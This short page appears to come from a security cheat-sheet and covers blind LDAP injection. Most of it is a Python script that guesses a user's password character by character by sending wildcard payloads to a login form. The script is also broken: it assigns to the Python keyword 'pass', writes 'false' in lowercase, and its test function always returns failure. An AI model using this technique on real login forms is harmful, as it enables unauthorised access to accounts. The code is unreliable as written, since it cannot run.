Comment on page
LDAP Injection

Example of retrieving a password using blind LDAP injection from a login form:
#!/usr/bin/python3
​
import requests
import string
import re
​
charset = "{}_-" + string.ascii_letters + string.digits
url = '<url>'
​
def go(p):
  d = {"username": "<username>", "password": f"{p}*"}
  r = requests.post(url + '/login', allow_redirects=False, data=d)
  # return true on success, false on error depending on the response
  return false
  
pass = ""
while True:
  for c in charset:
    if go(pass + c):
        pass +=  c
        print(pass)
CVEs
Ruby
Last modified 9mo ago